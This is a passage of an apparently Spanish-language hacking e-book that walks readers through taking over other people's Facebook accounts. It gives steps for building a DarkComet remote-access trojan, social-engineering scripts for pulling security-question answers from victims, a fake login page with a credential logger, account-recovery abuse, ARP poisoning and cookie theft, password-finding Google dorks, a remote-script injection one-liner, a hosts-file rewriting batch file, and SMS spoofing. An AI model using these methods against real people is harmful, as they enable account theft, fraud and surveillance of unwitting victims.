Ahora haga clic en "Descargar 3.0.4"

Ahora debe instalar No-DUP 3.0, haga clic en "Siguiente". Ahora, elija

"Ubicación de instalación" y haga clic en "Siguiente". Ahora elija

"Carpeta del menú de inicio" y haga clic en "Instalar". La

configuración se completó correctamente, haga clic en "Cerrar".

Derechos de autorwww.cyber-worldd.blogspot.in
32

ahora siguehttp://www.no-ip.com/ y haga clic en "Iniciar sesión", luego escriba su correo electrónico y su contraseña. Ahora, haga

clic en "Agregar un host"

Elija un "Nombre de host", ingrese su dirección IP y haga clic en "Crear host".

Listo, ahora abra No-IP DUC 3.0 e ingrese su correo electrónico y su contraseña y haga clic en "Aceptar".

Ahora, seleccione su "HOST" y haga clic en "Guardar".

Listo, puedes cerrar No-IP DUC 3.0

Descargar DarkComet v4.0aquí y ejecuta DarkComet.

Haga clic en [+], elija su puerto (sugiero 1604) y haga clic en "Escuchar". Ahora haga

clic en "Configuración".

Haga clic en "Mo-IPactualizador"y escriba su información No-IP.

Ahora editará su servidor, haga clic en "Editar servidor" y haga clic en "Configuración de la red",ingrese su

información y haga clic en "Probar red".

Haga clic en "Arranque del módulo" y elija suajustes. Haz clic en

"Instalar mensaje" y elige tu mensaje falso. Ahora haga clic en

"Module Shield" y elija su configuración. Ahora haga clic en

"Construir módulo" y haga clic en "Construir servidor". Ver los

resultados

Derechos de autorwww.cyber-worldd.blogspot.in
33

Sección 8 – Ataque de Ingeniería Social:-

Yo mismo he tenido algunas personas en el pasado que me han hecho preguntas sobre ingeniería social. Siempre le digo a

cualquiera que se imagine la ingeniería social como un juego. Pero antes de hablar sobre el 'Juego', quiero entrar en detalles sobre

los conocimientos básicos y la autopreparación.

Conocimientos básicos y auto preparación:


Es importante, como la mayoría de las cosas en la vida, estar completamente equipado y preparado para asumir una tarea. Yo mismo

sugeriría que tenga un esquema claro de lo que está tratando de lograr, ya sea obtener la contraseña de correo electrónico de alguien,

explotarlos por dinero, ingresar a un grupo/clan de juego en línea, etc., etc. En este caso, el correo electrónico y la contraseña deCuenta de

Facebook.

En primer lugar, debe tener en cuenta lo que necesitará, para este tutorial de ingeniería social voy a resumir
esto desde la perspectiva de obtener la contraseña de correo electrónico de alguien. Antes de continuar, me
gustaría enfatizar algunos factores importantes que quizás desee tener en cuenta:

1)La gente está más abierta contigo si te perciben como un idiota.


2)La gente sospecha menos de ti cuando los haces reír.
3)Las personas son más confiadas si realmente te interesas por ellas.

Voy a desglosar estos tres puntos para darle una mejor comprensión de por qué esto es:

Derechos de autorwww.cyber-worldd.blogspot.in
34

En el caso de 1 -casi todo el mundo parece ser más descuidado cuando te perciben como un idiota, la principal
razón es que no consideras a alguien que parece ser un idiota como una amenaza. Otra razón es que las personas
tienden a volverse más abiertas y arrogantes cuando sienten que están en un pedestal más alto que tú.(¡nunca
olvides eso!).Sin embargo, hay cosas que debes recordar, aunque estas cosas son ciertas si exageras tu
personalidad idiota, no será bueno para tu fortuna. Recuerda siempre que los verdaderos imbéciles son molestos
como el infierno, túNO HAGAquiere desanimar a la persona que está tratando de hacer ingeniería social (a menos
que esté tratando de fallar, luego noquearse).

En el caso de 2 -cuando se habla con alguien, es fácil ver por qué se recomienda esta regla. A menudo es un buen rompehielos,

que también refuerza la idea de que"eres un buen chico", lentamente le permite a la persona construir una relación de 'confianza'

contigo.

en el caso de 3 -También es un consejo obvio, si solo molestas a alguien para obtener información sin al menos
pretender interesarte en lo que está diciendo, no solo parecerás grosero, sino que hará que la persona se pregunte
por qué los estás investigando para obtener información personal.

Con estos tres puntos establecidos, ahora continuaré con mi ejemplo de cómo obtener el correo electrónico y la contraseña de
Facebook de alguien. Antes de entrar en detalles, es importante resumir lo que necesita para obtener con éxito la contraseña de
alguien mediante ingeniería social. Ahora podría intentar aplicarles ingeniería social para obtener su contraseña. Le aconsejo que
sea un poco más inteligente e indirectamente haga ingeniería social para obtener su contraseña al obtener su conocimiento de
recuperación de contraseña. Ahora es importante lo que necesita para hackear con éxito su cuenta a través de preguntas de
recuperación. Necesitarás lo siguiente:

Su dirección de correo electrónico

La contraseña de su cuenta

Con esto en mente, es imperativo que planee cómo obtendrá estos detalles. Te diré cómo lo hago. Pero
primero necesito que comprenda que toda esta transacción no se completará en el transcurso de un día,
puede demorar días o semanas según la persona. Te sugiero que hables con ellos y los leas primero. Si están
abiertos, puede hacerlo en cuestión de días; si no, sería mejor que lo extendiera en una o dos semanas.
También quiero que imagine lo que dirá, intente predecir sus respuestas y, SOBRE TODO, piense en un chivo expiatorio
sobre por qué los está investigando para obtener estas respuestas, en caso de que sea menos sutil y despierte sospechas, si
es que alguna vez sospechan de usted. pasará de una llama a un incendio, es importante sellar todas sus dudas en ti lo antes
posible.

Ahora hay muchas formas de obtener su contraseña y destinatario. Algunas personas y publican su dirección
en sus perfiles. En cuyo caso, se trata de presas fáciles, sin embargo, eso es raro. Por lo tanto, debe idear una
forma de obtener esa información. Ahora puede fingir que es del banco o algo así y pedir su dirección de
correo electrónico. O puedes fingir que eres un estudiante y estás investigando. Ser creativo

Derechos de autorwww.cyber-worldd.blogspot.in
35

Ahora necesito la respuesta a su pregunta de seguridad, ahora necesita averiguar cuál es la pregunta, le sugiero que finja
recuperar la contraseña para ver cuál es u obtener la información de todas las preguntas de recuperación que solicita el correo
electrónico. Voy a ir con la primera opción y decir, por ejemplo, que su pregunta de recuperación fue: ¿Cuál es el nombre de su
perro?

Cómo haría para obtener esto sería pretender tener una mascota propia, comenzaría la
conversación así:

yo:Ffs mi perro no deja de ladrar, en serio, ¿dónde dejé mi cinta adhesiva jajaja!
víctima:lol sí sé que a veces mi perro es el mismo, molesto -.-
yo:Ah tienes un perro? No me di cuenta de cuál es el nombre de tu perro, si no te importa que pregunte.

Es importante agregar"si no te importa que pregunte", porque le da a la persona un poco de poder sobre ti y también
muestra un poco de respeto (una vez más, refuerza la idea de que eres un buen tipo).

PUNTO:No me sumergiría directamente en "cuál es el nombre de su perro", comience primero con la raza y recuerde tratar
de predecir lo que preguntarán (el mío, bla, bla, ¿cuál es el suyo?).

Con eso en mente, estoy seguro de que ahora puede ver lo fácil que es diseñar la contraseña de alguien mediante ingeniería social a
través del método indirecto de recuperación de contraseña. Ahora, obviamente, la mayoría de las preguntas de recuperación no
serán sobre mascotas, en su mayoría son"apellido de soltera de la madre" "lugar de nacimiento"etc. Pero use la misma lógica y evite
esto, recuerde pensar en cada detalle y pregúntese esto si alguien le contara esta historia o le preguntara de cierta manera, ¿le
parecería legítimo?
y cuando tenga la dirección de correo electrónico, haga clic en Facebook, olvidé la contraseña y se enviará a su correo
electrónico.

El juego:

El juego consiste básicamente en perfeccionar la "autopreparación". La ingeniería social es un juego. Si lo piensas de


esta manera: cada vez que se te da confianza, avanzas un nivel, que cada nivel que avanzas, tu capacidad de obtener
información de esta persona se vuelve más fácil. En cierto sentido, dominar la capacidad de idear formas más
ingeniosas de manipular a alguien, sin despertar sospechas, es lo que separa a los novatos afortunados de las élites.

Al pensar en esto como un juego, debe reflexionar sobre sus objetivos. Como mencioné antes, trate de
imaginar el diálogo entre ambos, piense en cómo obtendrá ciertas cosas y, lo que es más importante, tenga
directivas claras. Con esto en mente, creo que ahora podemos hablar sobre cómo podrías considerar
presentarte.(sólo se aplica si la persona es de hecho un extraño).

Derechos de autorwww.cyber-worldd.blogspot.in
36

Entonces, si iba a perseguir a un completo extraño, primero debe intentar obtener la mayor cantidad de
investigación posible sobre ellos. Por ejemplo, edad, nombre. Esto es importante para compensar la identidad falsa.
¡También sugeriría que si eres ingeniero social más de una persona que escribas, en detalle! su alias no es diferente
para que no se confunda. Nada sería peor que usar el alias equivocado en la persona equivocada.

Al construir su identidad, decida qué le daría la mayor ventaja con esta persona. Esto puede ser desde fingir su edad
para que coincida con los intereses de esta persona, lo que le brinda la ventaja de poder "hacer clic" con la persona.
Pretendiendo ser un estudiante o en un trabajo sin salida por manipulación de simpatía o en el caso de un trabajo
sin salida, pretendiendo relacionarse con el esclavo. Hay muchas cosas que puedes hacer, como te he comentado
depende de las circunstancias que necesites.

Ingeniería social ¿El arte de la piratería humana?

Enlace de descarga -Haz click en mi

Derechos de autorwww.cyber-worldd.blogspot.in
37

Sección 9 - Suplantación de identidad:-

Suplantación de identidad-es un método de fraude por correo electrónico en el que el perpetrador envía un correo electrónico que

parece legítimo en un intento de recopilar información personal y financiera de los destinatarios. Por lo general, los mensajes

parecen provenir de sitios web conocidos y confiables. Los sitios web que los phishers falsifican con frecuencia incluyen PayPal,

eBay, MSN, Yahoo, BestBuy y America Online. Una expedición de phishing, como la expedición de pesca que le da nombre, es una

aventura especulativa: el phisher pone el señuelo con la esperanza de engañar al menos a algunas de las presas que encuentran el

cebo.

1.Primero, necesita una página de inicio de sesión falsa para Facebook (fake.html) y un script Php para redirigir y capturar las

contraseñas de las víctimas (login.php)

2.Descarga aquí -Haz click en mi

Clave -@hackaholic

Después de descargar los archivos, abra login.php, con un bloc de notas y busque el término
www.enteryoursite.com y reemplácelo con la dirección del sitio donde desea que se redirija a la víctima,
finalmente guárdelo.

Derechos de autorwww.cyber-worldd.blogspot.in
38

Nota :Este es un paso muy importante que redirigirá a la víctima a un sitio adecuado, de lo contrario, la víctima sospechará. En
nuestro caso, estamos haciendo falsosFacebookpágina de inicio de sesión por lo que es mejor redirigir a la víctima a
www.facebook.com/careers

4.Ahora cree una cuenta en un sitio de alojamiento web gratuito como 110mb.com, T35.com o ripway.com

5.Ahora cargue ambos archivos (fake.html, login.php) en su cuenta de alojamiento y envíe el enlace fake.html (página de inicio de

sesión de Facebook falsa) a su víctima

Ejemplo:- www.tusitio.110 mb.com/fake.html

6.Ahora, cuando la víctima ingrese todas sus credenciales, como el nombre de inicio de sesión y la contraseña en nuestra página de inicio

de sesión falsa y cuando haga clic en iniciar sesión, será redirigido al sitio que hicimos en el paso 3.

7.Ahora, para ver la identificación y la contraseña de las víctimas, inicie sesión en su cuenta de alojamiento "110mb.com", donde verá un nuevo archivo

"log.txt". Ábralo para ver la identificación de usuario y la contraseña de las víctimas.

Nota:-Si todavía está confundido, puede ver mi video sobre Hackear una cuenta de Facebook usando una página de inicio de sesión falsa

Derechos de autorwww.cyber-worldd.blogspot.in
39

Sección 10 - Uso de 3 Friend Attack: -


Nota -Las 3 cuentas falsas deben tener 7 días de antigüedad, de lo contrario, este Hack de Facebook no funcionará. Entonces, comencemos con

nuestro tutorial sobre Hackear una cuenta de Facebook.

1.Vaya a Facebook.com y haga clic en Olvidé mi contraseña.

2.Ahora proporcione el correo electrónico de la cuenta de Facebook de la víctima o proporcione el nombre de usuario de FB o el nombre del perfil y

haga clic en buscar. Y luego obtendrá la cuenta de perfil de las víctimas. Simplemente haga clic en "Esta es mi cuenta".

3.Luego haga clic en "Ya no tengo acceso a esto".

4.Ahora se le pedirá que ingrese una nueva dirección de correo electrónico, simplemente ingrese su nueva dirección de correo electrónico.

5.Ahora Facebook te pedirá que des la respuesta a la pregunta de seguridad. No se preocupe, simplemente ingrese la respuesta
incorrecta tres veces y será llevado a la nueva página.

6.Aquí está la parte principal de la piratería de la cuenta de Facebook. Haga clic en Continuar y FB le pedirá que seleccione 3 amigos
de confianza. Habrá una lista completa de amigos de la víctima que también incluye su"Tres cuentas de Facebook falsas".
Simplemente seleccione esas tres cuentas y luego Facebook enviará códigos de seguridad a nuestras cuentas falsas. Ahora recopile
esos códigos de seguridad e ingréselos. Entonces Facebook enviará"Correo electrónico de recuperación de contraseña"en la
dirección de correo electrónico que ingresamos en el paso 4. Por lo tanto, puede restablecer fácilmente la contraseña de la cuenta
de la víctima.

No, lo hemos hecho con éxito con Hackear cuentas de Facebook.

Nota :Hemos recibido los problemas como que no llegan la nueva página en

paso 5Esto depende de la actividad de la víctima en la cuenta de Facebook.

Amigos, espero que hayan disfrutado este artículo sobre Hackear cuentas de Facebook y si tienen algún problema con este
Hackeo de cuentas de Facebook gratis, por favor comenten.

Derechos de autorwww.cyber-worldd.blogspot.in
40

Sección 11 – Envenenamiento por ARP:-

Concepto básico::::::::>

Así que aquí estamos... nuestra principal víctima es LAN... Pero recuerde
que si está rastreando una red de área local, asegúrese de que su tarjeta
de red esté en modo promiscuo... si no, entonces use este cmd "netsh int
UR IP set global taskoffload =deshabilitar” Ahora comencemos la parte
principal de este tema. podemos clasificar nuestro tema en tres partes
principales

1=> Envenenamiento ARP—para envenenar a las víctimas “ARP Cache”

2=> Con Wireshark vamos a olfatear el coockie

3=> Finalmente, reemplazaremos la cookie de autenticación de las víctimas con


nuestras cookies e implementaremos la cuenta de las víctimas..:P Antes de comenzar,
necesitamos algunas herramientas como ::::::::
1) Caín y Abel

2) tiburón de alambre

3) Coockie Manager Plus (un complemento de Firefox)

Paso 1::::::::::: Envenenamiento por ARP

i) descargar Cain & Abel desde su sitio oficial

Derechos de autorwww.cyber-worldd.blogspot.in
41

ii) ahora encienda el sniffer haciendo clic en el botón verde donde indico con un
círculo rojo, después de iniciar Sniffer ahora presione el botón "+" para escanear
todas las direcciones MAC disponibles en nuestro
Vamos xD

LAN como esta foto ..

Derechos de autorwww.cyber-worldd.blogspot.in
42

Derechos de autorwww.cyber-worldd.blogspot.in
43

Una vez que haya escaneado todas las direcciones MAC e IP, es hora de realizar
MitMA, para comenzar, haga clic en la pestaña ARP en la parte inferior y haga
clic en el área blanca para encender + iniciar sesión en azul.
A continuación, haga clic en el signo "+" y aparecerá una lista de hosts a los que
le gustaría olfatear los paquetes... como esta imagen...

Derechos de autorwww.cyber-worldd.blogspot.in
44

Ahora haga clic en el botón Sniffer que estropeo en la imagen ...


comenzará a envenenar el enrutador en poco tiempo y comenzará a
capturar paquetes de sus víctimas ...: D

Derechos de autorwww.cyber-worldd.blogspot.in
45

Ahora vea esta imagen, aclarará que ARP Poisoning and


routing..

Así que hasta ahora hicimos ARP Poisonig en el caché ARP de las víctimas,
ahora usaremos wireshark para rastrear los paquetes (es decir, rastrear) ahora
comenzaremos Wireshark para capturar paquetes ...

Derechos de autorwww.cyber-worldd.blogspot.in
46

así que abra Wireshark y haga clic en las interfaces... como esta
imagen...

Ahora elija la interfaz correcta y haga clic en el botón de inicio... y continúe


olfateando alrededor de 15 minutos para capturar todos los paquetes... y
deténgase después de capturar...
A continuación, configure la cadena de filtro como http.coockie contiene "datr", ya
que sabemos que datr es la cookie de autenticación de Facebook...:P

Derechos de autorwww.cyber-worldd.blogspot.in
47

Derechos de autorwww.cyber-worldd.blogspot.in
48

Ahora haga clic con el botón derecho en ->copiar->bytes->solo texto imprimible y


copie todos los datos en el Bloc de notas... Ahora usaremos el Coockie Manager
(complemento de firefox)... así que ábralo en firefox... en primer lugar, abra http://
facebook.com y abra el coockie manager... y en el coockie manager haga clic en el
botón Agregar...

Derechos de autorwww.cyber-worldd.blogspot.in
49

Derechos de autorwww.cyber-worldd.blogspot.in
50

Después de refrescarme obtuve…

Derechos de autorwww.cyber-worldd.blogspot.in
51

Así que mis amigos eso es todo -

Derechos de autorwww.cyber-worldd.blogspot.in
52

Sección 12 - Descifrador de contraseña de


Facebook: -

FacebookPasswordDecryptor es el software GRATUITO para recuperar instantáneamente las


contraseñas de las cuentas de Facebook almacenadas en los navegadores web y mensajeros más
populares. La mayoría de las aplicaciones almacenan las contraseñas de inicio de sesión para evitar que
el usuario tenga que ingresar la contraseña cada vez. A menudo, estas aplicaciones utilizan su propio
mecanismo de cifrado patentado para almacenar las contraseñas de inicio de sesión, incluidas las
contraseñas de las cuentas de Facebook. FacebookPasswordDecryptor rastrea automáticamente cada
una de estas aplicaciones y recupera instantáneamente la contraseña cifrada de la cuenta de Facebook.

Derechos de autorwww.cyber-worldd.blogspot.in
53

Sección 13 – Hackear cuentas de FB usando


Google Dork:-

Requisitos previos: (¡Este es fácil!)

1. Un navegador web moderno e Internet.


2. Tiempo

[Nivel: Principiante]

Método 1: ¡Facebook! ¡Usaremos un tonto de Google para encontrar nombres


de usuario y contraseñas de muchas cuentas, incluido Facebook!
El idiota: intext:charset_test= email= default_persistent=
¡Ingrese eso en Google y se le presentarán varios sitios que tienen listas
de nombres de usuario y contraseñas!

Método 2: WordPress!
¡Esto buscará los archivos de copia de seguridad de WordPress que contienen las
contraseñas y todos los datos del sitio! The Dork: tipo de archivo: sql
inurl:wpcontent/
respaldo-*

Método 3: Tablero WWW!


Esto buscará el usuario y las contraseñas de los usuarios de WWWBoard.
Idiota: inurl:/wwwboard/passwd.txt

Método 4: ¡FrontPage!
Esto encontrará todos los usuarios y contraseñas, similar al anterior. El Dork:
ext:pwd inurl:(servicio | autores | administradores | usuarios) "# -
FrontPage-"

Derechos de autorwww.cyber-worldd.blogspot.in
54

Método 5: ¡Symfony! Encuentra la información de la base de datos y los inicios de sesión.


Dork: inurl:config/databases.yml -trac -trunk -"Google Code" -
fuente
- repositorio
Método 6: TeamSpeak! (¡¡Grande!!!!!) Esto buscará el archivo server.dbs (un
archivo de base de datos Sqlite con el nombre de usuario SuperAdmin
y contraseña!!!) The Dork: server-dbs "intitle:index of"

Método 7: ¡¡¡TeamSpeak2!!! (¡también grande!) Esto encontrará el archivo de registro que


tiene el usuario Super Admin y pasará a las 100 líneas principales. Busque "información
de cuenta de superadministrador:" The Dork:
"inurl:Teamspeak2_RC2/servidor.log"

Método 8: ¡Obtenga el pase de administrador! Simple idiota que busca todo tipo de
admin infoThe Dork: "información de cuenta de administrador" tipo de archivo: registro

Método 9: ¡Claves privadas! (¡ya no más!) Esto encontrará cualquier


archivo .pem que contenga claves privadas. The Dork: filetype:pem pem
texto:privado
Y el Ultimate, el directorio regular lleno de contraseñas....

Método 10: ¡El directorio de contraseñas! ¡Uno simple! El idiota:


intitle:"Índice
de..etc" contraseña

Derechos de autorwww.cyber-worldd.blogspot.in
55

Sección 14 – Piratería de la página de fans de Facebook :-

Este tutorial funciona casi al 100%, ya que todos sabemos que es difícil hackear la página de fans de Facebook, pero de alguna manera

cómo funciona este método en alguna página de fans y nos permite hackear la página de fans de Facebook fácilmente. Espero que

puedas hackear cualquier página de fans de Facebook después de leer esta publicación. Por favor, comenta y comparte.

y dale me gusta a esta publicación si la información a continuación es útil para ti.

Así que comencemos.

En primer lugar, debemos configurar un exploit y un sitio web para alojar el exploit. Si ya tiene un alojamiento, entonces es genial,

de lo contrario, hay un par de sitios web de alojamiento gratuitos que se pueden usar para propósitos tales como

Descargo de responsabilidad: Coder y los sitios relacionados no son responsables de ningún abuso realizado con este truco.

Pasos que debes seguir

1) Al principio, descargue el exploit deAquí .

2) Después de descargar el exploit, debe editarlo con cualquier software de edición, sugiero notepad ++, uno de los
mejores editores. Puedes descargarlo desdeAquí.

3) Abra el archivo llamado pagehack.js con notepad++. Ahora busque el texto [email protected]
presionandoCTRL+Fy reemplácelo con su propia identificación de correo electrónico que utilizó al registrarse en
Facebook.

Derechos de autorwww.cyber-worldd.blogspot.in
56

4) Ahora debes cambiar el texto viral que se enviará a los amigos de las víctimas. Para hacer esto, busque el texto
¡Oye, mira lo que tengo! y substitúyalo por su propio texto. Este texto será enviado al muro de facebook de 15
amigos de la víctima. Dado que es un bot de publicación automática, para evitar que Facebook lo bloquee, reduje su
capacidad a 15. Ahora solo guárdelo como cualquier cosa.js (Consejo: Sea ingeniero social y cámbiele el nombre a
algo más atractivo como getprizes.js o booster .js Como ya he publicado unartículo sobre piratería con ingeniería
social Aquí )

5) Ahora debe cargar este script en su servidor. Para esto, cree una cuenta en 0fess.net o
000webhost.com (t35 o 110mb no ayudarán esta vez) y use filezilla y cargue esto en su raíz. Entonces,
la dirección donde se carga su script será la siguiente:
------------------------------------------------------------------------------------------

- - - - - - - - - - www.yoursite.0fess.net/booster.js

----------------------------------------------------------------------------------------------------

6)Ahora viene la parte más importante de este Hack. Debe convencer al administrador de esa página de fans para que coloque el
siguiente código (Nota: no olvide reemplazar el texto en negrita con la dirección de su secuencia de comandos) en la barra de
direcciones de su navegador y presione Intro mientras está en Facebook.
----------------------------------------------------------------------------------------------------

javascript:(a = (b = documento).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“,


b.body.appendChild(a); vacío (0)
----------------------------------------------------------------------------------------------------

Consejo: puedes engañarlo haciéndolo codicioso para agarrar algo. También puede codificar esto en formato ASCII para obtener
mejores resultados.

Ahora está hecho, ha pirateado con éxito el administrador de la página de fans.


En estos días, muchas páginas de fans de Facebook están siendo pirateadas con este truco. Así que para todos los
administradores, estén seguros de estos ataques. Esto se explica solo con fines educativos.

Derechos de autorwww.cyber-worldd.blogspot.in
57

Sección 15 - Phising de escritorio:-

Concepto detrás del truco:


El archivo de hosts es un archivo de computadora utilizado en un sistema operativo para asignar nombres de host a direcciones IP.
El archivo host solía desempeñar un papel importante antes del Sistema de nombres de dominio (DNS) llego a existir. Un archivo de
hosts básicamente controla cómo su navegador encuentrasitios web.

Puede usar el archivo host para asignar cualquier palabra o dominio a una dirección IP oa otro dominio. Por
ejemplo si añadimos
74.125.236.84 www.facebook.com

Al archivo host lo que sucederá es que cuando escribasFacebook.comen su navegador se abrirá google.com
en lugar de facebook.com esto se debe a que (74.125.236.84) esde GoogleIp, por lo que el navegador lo
tomará a ciegas. Entonces, si un atacante es capaz de agregar su dirección IP (donde aloja la página de
phisher), la víctima será redirigida a los atacantes.Sitio de phishing

Lo que hace que este ataque sea tan exitoso es que la víctima no lo sabrá, ya que la URL solo sigue siendo
facebook.com.

¿Qué no te enseñan los hackers?


Veo muchos tutoriales en la red sobre phishing de escritorio, pero la mayoría de los tutoriales no funcionarán debido a las
siguientes cosas

Hoy en día, cada uno tiene una dirección IP dinámica (la ip cambia cada vez que reinicia). Ahora, la mayoría
de las computadoras están detrás de un enrutador, por lo que tenemos que redireccionar nuestro servidor
web para acceder a él. Esto es un poco confuso para los novatos.

Pero en este tutorial explicaré cómo puedes superar todos estos problemas.

Como superar este problema ?


Podemos superar los problemas anteriores mediante el uso de una VPN estática. Con una VPN, tendrá
una dirección IP estática y no necesitará redirigir su servidor web.

Demostración
Cosas que necesita: -
1. Página Phisher-Puede descargar la página de Phisher de Facebook desdeAquí (He agregado
una página adicional para que sea más realista, la víctima recibirá un mensaje que dice que
Facebook está bloqueado por su ISP)

Derechos de autorwww.cyber-worldd.blogspot.in
58

2. servidor web-Puede usar wamp o xammp, le recomendaría que use xammp, he escrito un
tutorial sobre cómo puede instalar, usarXamp por favor consulte el artículo para más detalles

3. Una VPN estática-Usaré proXPN VPN para este tutorial, pero le recomiendo que use Strong
Open VPN, ya que es muy estable, puede descargarlo deAquí

Procedimiento:-

1.Primero descargue e instale xampp en su PC, comienceapachey servicios Msql

2.Descargue la página de Phisher de Facebook Desde el enlace anterior, Coloque todo su contenido en el
documentos htcarpeta que debe estar debajoXamp(lugar donde instaló xampp)

3.InstalarProXPNVPN o cualquier otra estáticavpn,Te recomiendo que uses Strong Vpn ya que es muy
estable y te da una IP estática Una vez que lo instales y lo ejecutes, obtendrás una IP estática (vpn)

4.Ahora tenemos que reemplazar algo de texto en elanfitrión de las víctimasarchivo que es
aC:\windows\system32\drivers\etc.,Puede hacer esto de muchas maneras, ya sea usando un archivo SFX o
usando un archivo por lotes para este tutorial usaremos unarchivo por lotespara realizar el trabajo

@echo apagado

eco 172.X.XX.XX www.facebook.com >> C:\windows\system32\drivers\etc\hosts


salida

Reemplace "172.X.XX.XX" con su dirección IP (vpn), finalmente guárdelo como Guardarlo como algo
.murciélago

5.Ahora, para evitar sospechas, puede vincular el archivo por lotes con un archivo legítimo. Consulte amablemente el
Carpetas tutorial para más información

6.Ahora envíe el archivo por correo electrónico o cárguelo en un sitio y pídale a la víctima que descargue el archivo.
, Después de la víctimadescargasy hace clic en el archivo, su archivo host será reemplazado, por lo que ahora,
cuando la víctima ingrese a facebook.com, será redirigido a nuestra página Phisher, pero elURLpermanecerá como
Facebook.com

Para ver todas las credenciales de las víctimas y la contraseña abierta recién creadaIniciar sesión.txt que se encuentra debajodocumentos
htcarpeta

Derechos de autorwww.cyber-worldd.blogspot.in
59

Derechos de autorwww.cyber-worldd.blogspot.in
60

Sección 1 - Hackea el estado de FB de tus


amigos: -

Primero envía a tu víctima este enlacehttps://m.facebook.com/upload.php?email&_rdr

y pídele que te dé el correo [email protected]

Luego vaya a su correo electrónico de Gmail, vaya a nuevo mensaje y ponga el correo electrónico que le
envió y escriba lo que desea publicar en el asunto, deje el mensaje vacío, vaya y revise su muro.

^_̂ Disfruta ;)

Derechos de autorwww.cyber-worldd.blogspot.in
61

Sección 2: actualizar el estado de FB con nombres


falsos: -
Al usar este truco, puede crear un estado falso de cualquier nombre enFacebook y toma fotografías y
celosa a tus amigos.

Para ello solo sigue estos sencillos pasos

Ir a Máquina de pared Haga clic aquí

Luego haga clic enconectarluego, permita las aplicaciones a través de su cuenta de fb. Luego aparecerá el cuadro

de la máquina de pared. Este cuadro es personalizable editarnombresyFotos. Después de completar todos los

pasos, haga clic enahorrarbotón. Despuésabiertosu archivo guardado en una nueva pestaña y tome una foto

mediante la pantalla de impresión

Solo eche un vistazo a todos los pasos que ha seguido

Derechos de autorwww.cyber-worldd.blogspot.in
62

Derechos de autorwww.cyber-worldd.blogspot.in
63

Sección 3: use FB en lenguaje de piratas informáticos: -

1- Inicie sesión en su cuenta de Facebook

2- Ir a la configuración de la cuenta

3- buscar la opción de idioma

4- ahora configúralo en "1337


hablar" ¡lo has hecho!

si desea usar Facebook en su idioma anterior, retroceda los pasos y


configure la opción de idioma en inglés (EE. UU.) nuevamente.

Derechos de autorwww.cyber-worldd.blogspot.in
64

Sección 4: detenga las etiquetas de fotos no deseadas en la línea

de tiempo: -

Puede habilitar esta opción con unos simples pasos:

paso 1: Ve a la configuración de privacidad de Facebook


paso 2: simplemente vaya a "Configuración de privacidad> Línea de tiempo y etiquetado> Revise las publicaciones en las que sus amigos lo
etiquetan antes de que aparezcan en su línea de tiempo" y active esta opción.

paso 3: Las capturas de pantalla que se mencionan a continuación lo ayudarán a habilitar esta función: haga
clic en Editar configuración de la línea de tiempo y la opción de etiquetado.

Paso 4: verá una opción "Revise las publicaciones en las que sus amigos lo etiquetan antes de que aparezcan en su línea de tiempo".
Ahora haga clic en "Desactivado" y configúrelo en "Activado" para habilitar esta función para usted.

Paso 5: Y ahora, finalmente, habilite esta función.

Después de guardar los cambios, si alguien lo etiqueta en Facebook, obtendrá opciones para aprobar o
desaprobar las publicaciones. Estas publicaciones no estarán visibles en su línea de tiempo hasta que las
apruebe manualmente. Creo que para las niñas sería muy útil.

Derechos de autorwww.cyber-worldd.blogspot.in
sesenta y cinco

Sección 5 - Cómo cambiar/actualizar el estado


de alguien en Facebook: -

NOTA:El esclavo DEBE tener habilitada la función de texto de Facebook en su cuenta, si no la tienen,
esto no funcionará

Entonces, en este truco de Facebook, usaremos SMSGlobal para cambiar el estado de tu amigo. SMSGlobal nos
permite enviar mensajes a cualquier número desde el número de cualquier persona. Es decir, enviaremos a
Facebook un SMS falso desde el número de móvil registrado de tu amigo.

Facebook pensará que el mensaje ha sido enviado por su amigo y su estado se actualizará de acuerdo con el
contenido del mensaje enviado por nosotros.

1. Vaya a SMSGlobal.com y regístrese para obtener una cuenta.

2. Después de iniciar sesión en su cuenta, haga clic en "Enviar SMS a un número"

3. Ingrese la información de la siguiente manera:

Derechos de autorwww.cyber-worldd.blogspot.in
66

Enviar SMS a: 919232232665


ID del remitente De: el número de móvil registrado de su amigo.
Mensaje: el estado que desea actualizar para su amigo. Introduce lo que quieras. Aparecerá como el
nuevo estado de tu amigo.

Presiona Enviar SMS.

4. Ahora, Facebook actualizará el estado de tu amigo al mensaje que has enviado.

Derechos de autorwww.cyber-worldd.blogspot.in
67

Sección 6 - Rastrear a alguien en Facebook: -

Este método funciona con la notificación que recibe en su correo electrónico, por ejemplo, si alguien comenta su
estado o le envía un mensaje en Facebook, ¡por supuesto que recibirá la notificación en su correo electrónico!

entonces tú eresAy tu victima esBcuando su víctima comente su hilo en Facebook en el sistema


de Facebook diráA <===========> B

Entonces, dónde encontrar la IP de su víctima es simple, solo vaya a su correo electrónico y a la notificación y vea la
fuente del mensaje, escriba Ctrl +f y luego busque esto:

X-Facebook: de zuckmail
encontrará un código como este ([MTI3LjAuMC4x]) está codificado en base 64, debe decodificarlo en texto ASCII
y luego encontrará la IP de su objetivo ¡Enj0y!
Herramienta para decodificar y codificar=========>>>Ven aquí para

más información revisa la primera líneainformación de la tienda x:

Derechos de autorwww.cyber-worldd.blogspot.in
68

Sección 7 - Publicar estado en FB por cualquier

dispositivo: -

Hola chicos, muchos de ustedes me preguntan acerca de este truco sobre cómo actualizar
el estado de Facebook a través de cualquier dispositivo como i5, blackberry, galaxy s3,
lumia, Android, etc.*Fácil, voy a proporcionarle un sitio web desde donde puede actualizar
su estado a través de cualquier dispositivo, simplemente visite el enlace que figura a
continuación.

puntos a favor:desde este sitio puede actualizar su estado de forma segura, no se producirá
ningún bloqueo de Facebook. Este sitio es spam, está libre de errores y virus. ¡Disfrútelo :)!
Enlace :
http://www.updateviaz.com/

Derechos de autorwww.cyber-worldd.blogspot.in
69

Sección 8 - Cómo publicar en todos los grupos de FB


con un solo clic: -

1) visita este sitio webhttp://www.hexcolor.in/tools/multipost/index.php

2) inicia sesión con tu cuenta de facebook

3) ahora sigue todos los requisitos y verás algo así

4) Verá todo su grupo de Facebook y una casilla llenará su mensaje y marcará todo.

grupo haga clic en la publicación

5) lo has hecho :)> !!!

NOTA: PRUÉBELO A SU PROPIO RIESGO PORQUE EL USO REGULAR PUEDE


BLOQUEAR
TU CUENTA DE FB....!!!!

Derechos de autorwww.cyber-worldd.blogspot.in
70

Sección 9 – Publicar estado en blanco o


comentar en Facebook:-

PASO 1)Ir a la tuya o la de tu amigopared

